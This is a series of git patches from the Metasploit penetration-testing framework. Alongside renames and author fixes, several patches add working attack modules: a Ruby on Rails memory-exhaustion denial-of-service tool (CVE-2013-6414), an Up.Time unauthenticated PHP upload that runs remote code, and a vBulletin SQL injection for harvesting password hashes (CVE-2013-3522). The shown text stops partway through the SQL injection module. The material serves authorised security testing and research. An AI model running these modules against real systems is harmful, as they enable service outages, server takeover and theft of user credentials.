 module Payload::Windows::ReflectiveDllInject_x64
 
-  include Msf::RdiMixin
+  include Msf::ReflectiveDLLInjection
   include Msf::Payload::Windows
 
   def initialize(info = {})
diff --git a/lib/msf/core/rdi_mixin.rb b/lib/msf/core/rdi_mixin.rb
index 6e82a5505c..0f3cb6888e 100644
--- a/lib/msf/core/rdi_mixin.rb
+++ b/lib/msf/core/rdi_mixin.rb
@@ -7,7 +7,7 @@
 #
 ###
 
-module Msf::RdiMixin
+module Msf::ReflectiveDLLInjection
 
   PAGE_ALIGN = 1024
 
diff --git a/modules/exploits/windows/local/ms10_015_kitrap0d.rb b/modules/exploits/windows/local/ms10_015_kitrap0d.rb
index e2cbc45eb6..6dda8f4ce7 100644
--- a/modules/exploits/windows/local/ms10_015_kitrap0d.rb
+++ b/modules/exploits/windows/local/ms10_015_kitrap0d.rb
@@ -11,7 +11,7 @@ require 'rex'
 class Metasploit3 < Msf::Exploit::Local
   Rank = GreatRanking
 
-  include Msf::RdiMixin
+  include Msf::ReflectiveDLLInjection
   include Post::File
   include Post::Windows::Priv
 
diff --git a/modules/exploits/windows/local/ppr_flatten_rec.rb b/modules/exploits/windows/local/ppr_flatten_rec.rb
index c6d845a552..e094c42bce 100644
--- a/modules/exploits/windows/local/ppr_flatten_rec.rb
+++ b/modules/exploits/windows/local/ppr_flatten_rec.rb
@@ -10,7 +10,7 @@ require 'rex'
 class Metasploit3 < Msf::Exploit::Local
   Rank = AverageRanking
 
-  include Msf::RdiMixin
+  include Msf::ReflectiveDLLInjection
   include Msf::Post::File
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Process
diff --git a/modules/post/windows/manage/reflective_dll_inject.rb b/modules/post/windows/manage/reflective_dll_inject.rb
index a2c192d01e..443520eb2d 100644
--- a/modules/post/windows/manage/reflective_dll_inject.rb
+++ b/modules/post/windows/manage/reflective_dll_inject.rb
@@ -9,7 +9,7 @@ require 'rex'
 
 class Metasploit3 < Msf::Post
 
-  include Msf::RdiMixin
+  include Msf::ReflectiveDLLInjection
 
   def initialize(info={})
     super( update_info( info,

From 7b24f815ee4b0a6421a6f22b982e50270558f4e1 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Wed, 4 Dec 2013 22:54:07 +1000
Subject: [PATCH 171/217] Missed a single module in rename

---
 lib/msf/core/payload/windows/reflectivedllinject.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/payload/windows/reflectivedllinject.rb b/lib/msf/core/payload/windows/reflectivedllinject.rb
index 3784b7a43f..1761da4434 100644
--- a/lib/msf/core/payload/windows/reflectivedllinject.rb
+++ b/lib/msf/core/payload/windows/reflectivedllinject.rb
@@ -15,7 +15,7 @@ module Msf
 
 module Payload::Windows::ReflectiveDllInject
 
-  include Msf::RdiMixin
+  include Msf::ReflectiveDLLInjection
   include Msf::Payload::Windows
 
   def initialize(info = {})

From f5a45bfe5281782d74042b528a4ecbf852fc389f Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Wed, 4 Dec 2013 13:31:22 -0600
Subject: [PATCH 172/217] @twitternames not supported for author fields

It's kind of a dumb reason but there are metasploit metadata parsers out
there that barf all over @names. They assume user@email.address. Should
be fixed some day.
---
 modules/exploits/unix/webapp/kimai_sqli.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/unix/webapp/kimai_sqli.rb b/modules/exploits/unix/webapp/kimai_sqli.rb
index 83c597d009..961dcb3417 100644
--- a/modules/exploits/unix/webapp/kimai_sqli.rb
+++ b/modules/exploits/unix/webapp/kimai_sqli.rb
@@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'drone (@dronesec)', # Discovery and PoC
+          'drone', # Discovery and PoC
           'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module
         ],
       'References'     =>

From d0071d7baac4148383c5739002f45a1a1e434120 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Wed, 4 Dec 2013 14:57:30 -0600
Subject: [PATCH 173/217] Add CVE-2013-6414 Rails Action View DoS

---
 .../auxiliary/dos/http/rails_action_view.rb   | 84 +++++++++++++++++++
 1 file changed, 84 insertions(+)
 create mode 100644 modules/auxiliary/dos/http/rails_action_view.rb

diff --git a/modules/auxiliary/dos/http/rails_action_view.rb b/modules/auxiliary/dos/http/rails_action_view.rb
new file mode 100644
index 0000000000..3b7ca5285f
--- /dev/null
+++ b/modules/auxiliary/dos/http/rails_action_view.rb
@@ -0,0 +1,84 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Dos
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Ruby-on-Rails Action View MIME Memory Exhaustion',
+      'Description'    => %q{
+        This module exploits a Denial of Service (DoS) condition in the handling of MIME caching
+        of Action View. By sending a specially crafted content-type header to a rails application,
+        it is possible for it to store the invalid MIME type, and may eventually consumes all
+        memory if enough invalid MIMEs are given.
+
+        Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16.
+      },
+      'Author'         =>
+        [
+          'Toby Hsieh', # Reported the issue
+          'joev',       # Metasploit
+          'sinn3r'      # Metasploit
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2013-6414' ],
+          [ 'URL', 'http://seclists.org/oss-sec/2013/q4/400' ],
+          [ 'URL', 'https://github.com/rails/rails/commit/bee3b7f9371d1e2ddcfe6eaff5dcb26c0a248068' ]
+        ],
+      'DisclosureDate' => 'Dec 04 2013'))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptInt.new('MAXSTRINGSIZE', [true, 'Max string size', 20000]),
+        OptInt.new('RLIMIT',        [true,  "Number of requests to send", 100000])
+      ],
+    self.class)
+  end
+
+  def host
+      host = datastore['RHOST']
+      host += ":" + datastore['RPORT'].to_s if datastore['RPORT'] != 80
+      host
+  end
+
+  def long_string
+    Rex::Text.rand_text_alphanumeric(datastore['MAXSTRINGSIZE'])
+  end
+
+  def http_request
+    http = ''
+    http << "GET / HTTP/1.1\r\n"
+    http << "Host: #{host}\r\n"
+    http << "Content-Type: application/#{long_string}\r\n"
+    http << "\r\n"
+
+    http
+  end
+
+  def run
+    payload = http_request
+    begin
+      print_status("Stressing the target memory, this will take a lot of time...")
+      connect
+      datastore['RLIMIT'].times { sock.put(payload) }
+      print_status("Attack finished. If you read it, it wasn't enough to trigger an Out Of Memory condition.")
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+      print_status("Unable to connect to #{host}.")
+    rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error
+      print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached")
+    ensure
+      disconnect
+    end
+  end
+end

From b9368311254ae5dad62e004088939bc5eca9ed07 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Thu, 5 Dec 2013 08:13:54 +1000
Subject: [PATCH 174/217] Renamed the mixin module

---
 lib/msf/core/payload/windows/reflectivedllinject.rb        | 2 +-
 lib/msf/core/payload/windows/x64/reflectivedllinject.rb    | 2 +-
 lib/msf/core/{rdi_mixin.rb => reflective_dll_injection.rb} | 0
 modules/exploits/windows/local/ms10_015_kitrap0d.rb        | 2 +-
 modules/exploits/windows/local/ppr_flatten_rec.rb          | 2 +-
 modules/post/windows/manage/reflective_dll_inject.rb       | 2 +-
 6 files changed, 5 insertions(+), 5 deletions(-)
 rename lib/msf/core/{rdi_mixin.rb => reflective_dll_injection.rb} (100%)

diff --git a/lib/msf/core/payload/windows/reflectivedllinject.rb b/lib/msf/core/payload/windows/reflectivedllinject.rb
index 1761da4434..db0434a058 100644
--- a/lib/msf/core/payload/windows/reflectivedllinject.rb
+++ b/lib/msf/core/payload/windows/reflectivedllinject.rb
@@ -1,7 +1,7 @@
 # -*- coding: binary -*-
 
 require 'msf/core'
-require 'msf/core/rdi_mixin'
+require 'msf/core/reflective_dll_injection'
 
 module Msf
 
diff --git a/lib/msf/core/payload/windows/x64/reflectivedllinject.rb b/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
index 58f3a9bde6..dbe4b0f075 100644
--- a/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
+++ b/lib/msf/core/payload/windows/x64/reflectivedllinject.rb
@@ -1,7 +1,7 @@
 # -*- coding: binary -*-
 
 require 'msf/core'
-require 'msf/core/rdi_mixin'
+require 'msf/core/reflective_dll_injection'
 
 module Msf
 
diff --git a/lib/msf/core/rdi_mixin.rb b/lib/msf/core/reflective_dll_injection.rb
similarity index 100%
rename from lib/msf/core/rdi_mixin.rb
rename to lib/msf/core/reflective_dll_injection.rb
diff --git a/modules/exploits/windows/local/ms10_015_kitrap0d.rb b/modules/exploits/windows/local/ms10_015_kitrap0d.rb
index 6dda8f4ce7..360a3edab6 100644
--- a/modules/exploits/windows/local/ms10_015_kitrap0d.rb
+++ b/modules/exploits/windows/local/ms10_015_kitrap0d.rb
@@ -4,7 +4,7 @@
 ##
 
 require 'msf/core'
-require 'msf/core/rdi_mixin'
+require 'msf/core/reflective_dll_injection'
 require 'msf/core/exploit/exe'
 require 'rex'
 
diff --git a/modules/exploits/windows/local/ppr_flatten_rec.rb b/modules/exploits/windows/local/ppr_flatten_rec.rb
index e094c42bce..b2b10d4656 100644
--- a/modules/exploits/windows/local/ppr_flatten_rec.rb
+++ b/modules/exploits/windows/local/ppr_flatten_rec.rb
@@ -4,7 +4,7 @@
 ##
 
 require 'msf/core'
-require 'msf/core/rdi_mixin'
+require 'msf/core/reflective_dll_injection'
 require 'rex'
 
 class Metasploit3 < Msf::Exploit::Local
diff --git a/modules/post/windows/manage/reflective_dll_inject.rb b/modules/post/windows/manage/reflective_dll_inject.rb
index 443520eb2d..75da1ba66c 100644
--- a/modules/post/windows/manage/reflective_dll_inject.rb
+++ b/modules/post/windows/manage/reflective_dll_inject.rb
@@ -4,7 +4,7 @@
 ##
 
 require 'msf/core'
-require 'msf/core/rdi_mixin'
+require 'msf/core/reflective_dll_injection'
 require 'rex'
 
 class Metasploit3 < Msf::Post

From cfffd80d22866222232d217f2ef4e1b7c804a979 Mon Sep 17 00:00:00 2001
From: DoI <denis.andzakovic@security-assessment.com>
Date: Thu, 5 Dec 2013 11:56:05 +1300
Subject: [PATCH 175/217] Added uptime_file_upload exploit module

---
 .../exploits/linux/http/uptime_file_upload.rb | 96 +++++++++++++++++++
 1 file changed, 96 insertions(+)
 create mode 100644 modules/exploits/linux/http/uptime_file_upload.rb

diff --git a/modules/exploits/linux/http/uptime_file_upload.rb b/modules/exploits/linux/http/uptime_file_upload.rb
new file mode 100644
index 0000000000..44306f0f26
--- /dev/null
+++ b/modules/exploits/linux/http/uptime_file_upload.rb
@@ -0,0 +1,96 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::PhpEXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Up.Time Monitoring post2file.php Arbitrary File Upload',
+      'Description'    => %q{
+          This module exploits an arbitrary file upload vulnerability found within the Up.Time monitoring server
+          7.2 and below. A malicious entity can upload a PHP file into the webroot without authentication, leading
+          to arbitrary code execution.
+      },
+      'Author'         =>
+        [
+          'Denis Andzakovic <denis.andzakovic[at]security-assessment.com>' # Vulnerability discoverey and MSF module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf']
+        ],
+      'Payload'            =>
+        {
+          'BadChars' => "\x00"
+        },
+      'Platform'       => 'php',
+      'Arch'         => ARCH_PHP,
+      'Targets'        =>
+        [
+          [ 'Up.Time 7.2', { } ],
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Nov 19 2013'))
+
+    register_options([ OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']),], self.class)
+  end
+
+  def check
+    uri =  target_uri.path
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(uri, 'wizards', 'post2file.php')
+    })
+
+    if not res or res.code != 200
+      return Exploit::CheckCode::Unknown
+    end
+
+    return Exploit::CheckCode::Appears
+  end
+
+  def exploit
+    print_status("#{peer} - Uploading PHP to Up.Time server")
+    uri =  target_uri.path
+
+    peer = "#{rhost}:#{rport}"
+    @payload_name = "#{rand_text_alpha(5)}.php"
+    php_payload = get_write_exec_payload(:unlink_self=>true)
+
+    data = Rex::MIME::Message.new
+    post_data = "file_name=#{@payload_name}&script=#{php_payload}"
+
+
+    print_status("#{peer} - Uploading payload #{@payload_name}")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(uri, 'wizards', 'post2file.php'),
+      'data'   => post_data,
+      'headers'  => {
+        'Content-Type' => 'application/x-www-form-urlencoded'
+      }
+    })
+    if not res or res.code != 200
+      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
+    end
+
+    print_status("#{peer} - Executing payload #{@payload_name}")
+    res = send_request_cgi({
+      'uri'    => normalize_uri(uri, 'wizards', @payload_name),
+      'method' => 'GET'
+    })
+  end
+end

From fb2fcf429f224449361df28bfe5a484d2006b88c Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Wed, 4 Dec 2013 17:22:42 -0600
Subject: [PATCH 176/217] This one actually works

---
 modules/auxiliary/dos/http/rails_action_view.rb | 17 +++++++++++------
 1 file changed, 11 insertions(+), 6 deletions(-)

diff --git a/modules/auxiliary/dos/http/rails_action_view.rb b/modules/auxiliary/dos/http/rails_action_view.rb
index 3b7ca5285f..cdb592a46f 100644
--- a/modules/auxiliary/dos/http/rails_action_view.rb
+++ b/modules/auxiliary/dos/http/rails_action_view.rb
@@ -40,7 +40,8 @@ class Metasploit3 < Msf::Auxiliary
     register_options(
       [
         Opt::RPORT(80),
-        OptInt.new('MAXSTRINGSIZE', [true, 'Max string size', 20000]),
+        OptInt.new('MAXSTRINGSIZE', [true, 'Max string size', 60000]),
+        OptInt.new('REQ_COUNT',     [true, 'Number of HTTP requests for each iteration', 500]),
         OptInt.new('RLIMIT',        [true,  "Number of requests to send", 100000])
       ],
     self.class)
@@ -58,9 +59,9 @@ class Metasploit3 < Msf::Auxiliary
 
   def http_request
     http = ''
-    http << "GET / HTTP/1.1\r\n"
+    http << "GET /blah HTTP/1.1\r\n"
     http << "Host: #{host}\r\n"
-    http << "Content-Type: application/#{long_string}\r\n"
+    http << "Accept: #{long_string}\r\n"
     http << "\r\n"
 
     http
@@ -69,9 +70,13 @@ class Metasploit3 < Msf::Auxiliary
   def run
     payload = http_request
     begin
-      print_status("Stressing the target memory, this will take a lot of time...")
-      connect
-      datastore['RLIMIT'].times { sock.put(payload) }
+      print_status("Stressing the target memory, this will take a very long time...")
+      datastore['RLIMIT'].times { |i|
+        connect
+        datastore['REQ_COUNT'].times { sock.put(payload) }
+        disconnect
+      }
+
       print_status("Attack finished. If you read it, it wasn't enough to trigger an Out Of Memory condition.")
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
       print_status("Unable to connect to #{host}.")

From 8e9723788d38087a4f7c4392c0cbee822ed4fb07 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Wed, 4 Dec 2013 17:25:58 -0600
Subject: [PATCH 177/217] Correct description

---
 modules/auxiliary/dos/http/rails_action_view.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/dos/http/rails_action_view.rb b/modules/auxiliary/dos/http/rails_action_view.rb
index cdb592a46f..a62edfa19b 100644
--- a/modules/auxiliary/dos/http/rails_action_view.rb
+++ b/modules/auxiliary/dos/http/rails_action_view.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary
       'Name'           => 'Ruby-on-Rails Action View MIME Memory Exhaustion',
       'Description'    => %q{
         This module exploits a Denial of Service (DoS) condition in the handling of MIME caching
-        of Action View. By sending a specially crafted content-type header to a rails application,
+        of Action View. By sending a specially crafted 'Accept' header to a rails application,
         it is possible for it to store the invalid MIME type, and may eventually consumes all
         memory if enough invalid MIMEs are given.
 

From 07294106cb78c090332752eec77ed47e62883b49 Mon Sep 17 00:00:00 2001
From: DoI <denis.andzakovic@security-assessment.com>
Date: Thu, 5 Dec 2013 14:18:26 +1300
Subject: [PATCH 178/217] Removed redundant content-type parameter

---
 modules/exploits/linux/http/uptime_file_upload.rb | 3 ---
 1 file changed, 3 deletions(-)

diff --git a/modules/exploits/linux/http/uptime_file_upload.rb b/modules/exploits/linux/http/uptime_file_upload.rb
index 44306f0f26..d5102a13ee 100644
--- a/modules/exploits/linux/http/uptime_file_upload.rb
+++ b/modules/exploits/linux/http/uptime_file_upload.rb
@@ -79,9 +79,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'method' => 'POST',
       'uri'    => normalize_uri(uri, 'wizards', 'post2file.php'),
       'data'   => post_data,
-      'headers'  => {
-        'Content-Type' => 'application/x-www-form-urlencoded'
-      }
     })
     if not res or res.code != 200
       fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")

From c7bb80c1d7974be636b3b9ce24d19573a35ef7d5 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 5 Dec 2013 00:33:07 -0600
Subject: [PATCH 179/217] Add wvu as an author to author.rb

---
 lib/msf/core/module/author.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/module/author.rb b/lib/msf/core/module/author.rb
index a28fa14a68..563db9ec7d 100644
--- a/lib/msf/core/module/author.rb
+++ b/lib/msf/core/module/author.rb
@@ -45,7 +45,8 @@ class Msf::Module::Author
       'stinko'           => 'vinnie' + 0x40.chr + 'metasploit.com',
       'theLightCosine'   => 'theLightCosine' + 0x40.chr + 'metasploit.com',
       'todb'             => 'todb' + 0x40.chr + 'metasploit.com',
-      'vlad902'          => 'vlad902' + 0x40.chr + 'gmail.com'
+      'vlad902'          => 'vlad902' + 0x40.chr + 'gmail.com',
+      'wvu'              => 'wvu' + 0x40.chr + 'metasploit.com'
     }
 
   #

From 09e7b2149f5d28b83db0c0f786268766bcf3c6a1 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 5 Dec 2013 00:45:15 -0600
Subject: [PATCH 180/217] Update William's e-mail in .mailmap

---
 .mailmap | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.mailmap b/.mailmap
index 2901c8bc5c..0ec72fda14 100644
--- a/.mailmap
+++ b/.mailmap
@@ -20,7 +20,7 @@ wchen-r7 <wchen-r7@github>         sinn3r <msfsinn3r@gmail.com> # aka sinn3r
 wchen-r7 <wchen-r7@github>         sinn3r <wei_chen@rapid7.com>
 wchen-r7 <wchen-r7@github>         Wei Chen <Wei_Chen@rapid7.com>
 wvu-r7 <wvu-r7@github>             William Vu <William_Vu@rapid7.com>
-wvu-r7 <wvu-r7@github>             William Vu <wvu@nmt.edu>
+wvu-r7 <wvu-r7@github>             William Vu <wvu@metasploit.com>
 
 # Above this line are current Rapid7 employees. Below this paragraph are
 # volunteers, former employees, and potential Rapid7 employees who, at

From 93e5e8fd48d8d113dcc9bfc56ebfa55242b0e212 Mon Sep 17 00:00:00 2001
From: Tod Beardsley <tod_beardsley@rapid7.com>
Date: Thu, 5 Dec 2013 02:24:24 -0600
Subject: [PATCH 181/217] Derp'ed on corelanc0d3r's spelling

---
 .mailmap | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/.mailmap b/.mailmap
index 2901c8bc5c..df1ff6d075 100644
--- a/.mailmap
+++ b/.mailmap
@@ -40,8 +40,8 @@ Chao-mu <Chao-Mu@github>               chao-mu <chao.mu@minorcrash.com>
 Chao-mu <Chao-Mu@github>               chao-mu <chao@confusion.(none)>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <chris.riley@c22.cc>
 ChrisJohnRiley <ChrisJohnRiley@github> Chris John Riley <reg@c22.cc>
-corelanc0d3er <corelanc0d3er@github>   corelanc0d3r <peter.ve@corelan.be>
-corelanc0d3er <corelanc0d3er@github>   Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
+corelanc0d3r <corelanc0d3r@github>     corelanc0d3r <peter.ve@corelan.be>
+corelanc0d3r <corelanc0d3r@github>     Peter Van Eeckhoutte (corelanc0d3r) <peter.ve@corelan.be>
 darkoperator <darkoperator@github>     Carlos Perez <carlos_perez@darkoperator.com>
 efraintorres <efraintorres@github>     efraintorres <etlownoise@gmail.com>
 efraintorres <efraintorres@github>     et <>

From 3957bbc7103aba3e35b3e6077d55794dbed04a61 Mon Sep 17 00:00:00 2001
From: Joshua Harper <josh@radixtx.com>
Date: Thu, 5 Dec 2013 08:33:47 -0600
Subject: [PATCH 182/217] capitalization ("skype")
 (https://github.com/rapid7/metasploit-framework/pull/2675#discussion_r8120307)

Removed some Chrome artifacts and renamed one to reflect "Archived History."
(https://github.com/rapid7/metasploit-framework/pull/2675#discussion_r8120314)
((Will include other doxxes in another module.))
---
 .../post/windows/gather/forensics/gather_browser_history.rb | 6 ++----
 1 file changed, 2 insertions(+), 4 deletions(-)

diff --git a/modules/post/windows/gather/forensics/gather_browser_history.rb b/modules/post/windows/gather/forensics/gather_browser_history.rb
index ab17523d64..59e24b7ae2 100644
--- a/modules/post/windows/gather/forensics/gather_browser_history.rb
+++ b/modules/post/windows/gather/forensics/gather_browser_history.rb
@@ -39,10 +39,8 @@ class Metasploit3 < Msf::Post
 
     files_to_gather = [
       { :path => 'LocalAppData', :name => "Chrome History", :dir => "Google", :fname => "History." },
-      { :path => 'LocalAppData', :name => "Chrome History", :dir => "Google", :fname => "Login Data." },
-      { :path => 'LocalAppData', :name => "Chrome History", :dir => "Google", :fname => "Archived History." },
-      { :path => 'LocalAppData', :name => "Chrome History", :dir => "Google", :fname => "Bookmarks." },
-      { :path => 'AppData', :name => 'skype', :dir => 'Skype', :fname => "main.db" },
+      { :path => 'LocalAppData', :name => "Chrome Archived History", :dir => "Google", :fname => "Archived History." },
+      { :path => 'AppData', :name => 'Skype', :dir => 'Skype', :fname => "main.db" },
       { :path => 'AppData', :name => "Firefox", :dir => "Mozilla", :fname => "places.sqlite" }
     ]
 

From cd5172384fa66241f64f36214e6e83c97d3d98a4 Mon Sep 17 00:00:00 2001
From: Joshua Harper PI GCFE GCFA GSEC <josh@radixtx.com>
Date: Thu, 5 Dec 2013 08:43:19 -0600
Subject: [PATCH 183/217] Rename gather_browser_history.rb to
 browser_history.rb

---
 .../forensics/{gather_browser_history.rb => browser_history.rb} | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
 rename modules/post/windows/gather/forensics/{gather_browser_history.rb => browser_history.rb} (99%)

diff --git a/modules/post/windows/gather/forensics/gather_browser_history.rb b/modules/post/windows/gather/forensics/browser_history.rb
similarity index 99%
rename from modules/post/windows/gather/forensics/gather_browser_history.rb
rename to modules/post/windows/gather/forensics/browser_history.rb
index 59e24b7ae2..6b27348f02 100644
--- a/modules/post/windows/gather/forensics/gather_browser_history.rb
+++ b/modules/post/windows/gather/forensics/browser_history.rb
@@ -96,4 +96,4 @@ class Metasploit3 < Msf::Post
     end
     return true
   end
-end
\ No newline at end of file
+end

From fb84d7e7fe1a2c978247ede2d7e5f0da96f3cc5c Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Fri, 6 Dec 2013 07:54:25 +1000
Subject: [PATCH 184/217] Update to yardoc conventions

---
 lib/msf/core/reflective_dll_injection.rb | 21 +++++++++++----------
 1 file changed, 11 insertions(+), 10 deletions(-)

diff --git a/lib/msf/core/reflective_dll_injection.rb b/lib/msf/core/reflective_dll_injection.rb
index 0f3cb6888e..c8a46e7c09 100644
--- a/lib/msf/core/reflective_dll_injection.rb
+++ b/lib/msf/core/reflective_dll_injection.rb
@@ -14,10 +14,11 @@ module Msf::ReflectiveDLLInjection
   #
   # Inject the given shellcode into a target process.
   #
-  # +process+ - The process to inject the shellcode into.
-  # +shellcode+ - The shellcode to inject.
+  # @param process The process to inject the shellcode into.
+  # @param shellcode The shellcode to inject.
   #
-  # @return Address of the shellcode in the target process's memory.
+  # @return [Fixnum] Address of the shellcode in the target process's
+  #                  memory.
   #
   def inject_into_process(process, shellcode)
     shellcode_size = shellcode.length
@@ -37,10 +38,10 @@ module Msf::ReflectiveDLLInjection
   # Load a reflectively-injectable DLL from disk and find the offset
   # to the ReflectiveLoader function inside the DLL.
   #
-  # +dll_path+ - Path to the DLL to load.
+  # @param dll_path Path to the DLL to load.
   #
-  # #return Tuple of DLL contents and offset to the +ReflectiveLoader+
-  #         function within the DLL.
+  # @return [Array] Tuple of DLL contents and offset to the
+  #                 +ReflectiveLoader+ function within the DLL.
   #
   def load_rdi_dll(dll_path)
     dll = ''
@@ -64,11 +65,11 @@ module Msf::ReflectiveDLLInjection
   # Inject a reflectively-injectable DLL into the given process
   # using reflective injection.
   #
-  # +process+ - The process that will have the DLL injected into it.
-  # +dll_path+ - Path to the DLL that is to be loaded and injected.
+  # @param process The process that will have the DLL injected into it.
+  # @param dll_path Path to the DLL that is to be loaded and injected.
   #
-  # @return Tuple of allocated memory address and offset to the
-  #         +ReflectiveLoader+ function.
+  # @return [Array] Tuple of allocated memory address and offset to the
+  #                 +ReflectiveLoader+ function.
   #
   def inject_dll_into_process(process, dll_path)
     dll, offset = load_rdi_dll(dll_path)

From a380d9b4f2e389259918fb25aed11b71e5636f63 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 5 Dec 2013 15:58:05 -0600
Subject: [PATCH 185/217] Add aux module for CVE-2013-3522

---
 .../auxiliary/gather/vbulletin_vote_sqli.rb   | 190 ++++++++++++++++++
 1 file changed, 190 insertions(+)
 create mode 100644 modules/auxiliary/gather/vbulletin_vote_sqli.rb

diff --git a/modules/auxiliary/gather/vbulletin_vote_sqli.rb b/modules/auxiliary/gather/vbulletin_vote_sqli.rb
new file mode 100644
index 0000000000..985b6bbc37
--- /dev/null
+++ b/modules/auxiliary/gather/vbulletin_vote_sqli.rb
@@ -0,0 +1,190 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'vBulletin Password Collector via nodeid SQL Injection',
+      'Description'    => %q{
+        This module exploits a SQL Injection vulnerability found in vBulletin 5 that has been
+        used in the wild since March 2013. This module can be used to extract the web application's
+        usernames and hashes, which could be used to authenticate into the vBulletin admin control
+        panel.
+      },
+      'References'     =>
+        [
+          [ 'CVE', '2013-3522' ],
+          [ 'OSVDB', '92031' ],
+          [ 'EDB', '24882' ],
+          [ 'BID', '58754' ],
+          [ 'URL', 'http://www.zempirians.com/archive/legion/vbulletin_5.pl.txt' ]
+        ],
+      'Author'         =>
+        [
+          'Orestis Kourides', # Vulnerability discovery and PoC
+          'sinn3r', # Metasploit module
+          'juan vazquez' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => "Mar 24 2013"
+    ))
+
+    register_options(
+      [
+        OptString.new("TARGETURI", [true, 'The path to vBulletin', '/']),
+        OptInt.new("NODE", [false, 'Valid Node ID']),
+        OptInt.new("MINNODE", [true, 'Valid Node ID', 1]),
+        OptInt.new("MAXNODE", [true, 'Valid Node ID', 100])
+      ], self.class)
+  end
+
+  def exists_node?(id)
+    mark = Rex::Text.rand_text_alpha(8 + rand(5))
+    result = do_sqli(id, "select '#{mark}'")
+
+    if result and result =~ /#{mark}/
+      return true
+    end
+
+    return false
+  end
+
+  def brute_force_node
+    min = datastore["MINNODE"]
+    max = datastore["MAXNODE"]
+
+    if min > max
+      print_error("#{peer} - MINNODE can't be major than MAXNODE")
+      return nil
+    end
+
+    for node_id in min..max
+      if exists_node?(node_id)
+        return node_id
+      end
+    end
+
+    return nil
+  end
+
+  def get_node
+    if datastore['NODE'].nil? or datastore['NODE'] <= 0
+      print_status("#{peer} - Brute forcing to find a valid node id...")
+      return brute_force_node
+    end
+
+    print_status("#{peer} - Checking node id #{datastore['NODE']}...")
+    if exists_node?(datastore['NODE'])
+      return datastore['NODE']
+    else
+      return nil
+    end
+  end
+
+  # session maybe isn't needed, unauthenticated
+  def do_sqli(node, query)
+    mark = Rex::Text.rand_text_alpha(5 + rand(3))
+    random_and = Rex::Text.rand_text_numeric(4)
+    injection = ") and(select 1 from(select count(*),concat((select (select concat('#{mark}',cast((#{query}) as char),'#{mark}')) "
+    injection << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) "
+    injection << "AND (#{random_and}=#{random_and}"
+
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, "index.php", "ajax", "api", "reputation", "vote"),
